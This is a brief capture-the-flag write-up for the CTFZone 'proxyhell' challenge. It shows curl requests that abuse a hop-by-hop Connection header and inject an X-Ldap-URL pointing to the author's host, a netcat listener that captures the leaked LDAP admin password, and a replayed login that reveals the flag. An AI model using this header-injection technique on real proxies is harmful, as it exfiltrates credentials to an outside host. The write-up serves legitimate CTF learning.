Tags: proxy ldap nginx
Rating:
TL;DR
1. Connect to the server with our server in the `X-Ldap-Header`:
```html
% curl proxyhell.ctfz.one -H "Connection: X-Real-Ip" -H "Authorization: basic YWRtaW46d3Jvbmc=" -H "X-Ldap-URL: ldap://4rt.one:100"
<html>
<head><title>500 Internal Server Error</title></head>
<body>
<center><h1>500 Internal Server Error</h1></center>
<hr><center>nginx</center>
</body>
</html>
```
2. Check logs of our server:
```bash
[email protected] ~ # nc -lp 100
0A`<▒cn=admin,dc=example,dc=org�dminpasswordisverysecure!2
```
3. Resend the request with a valid authorization header:
```bash
% echo -n "admin:@dminpasswordisverysecure\!2" | base64
YWRtaW46QGRtaW5wYXNzd29yZGlzdmVyeXNlY3VyZSEy
```
```html
% curl proxyhell.ctfz.one -H "Connection: X-Real-Ip" -H "Authorization: basic YWRtaW46QGRtaW5wYXNzd29yZGlzdmVyeXNlY3VyZSEy"
<html>
<body>
<h1>CTFZone{W3_l0v3_@_l0t_pr0xy_@nd_bug9_1n_th3m}</h1>
</body>
</html>
```
[read more](https://sh1yo.art/ctf/proxyhell/)
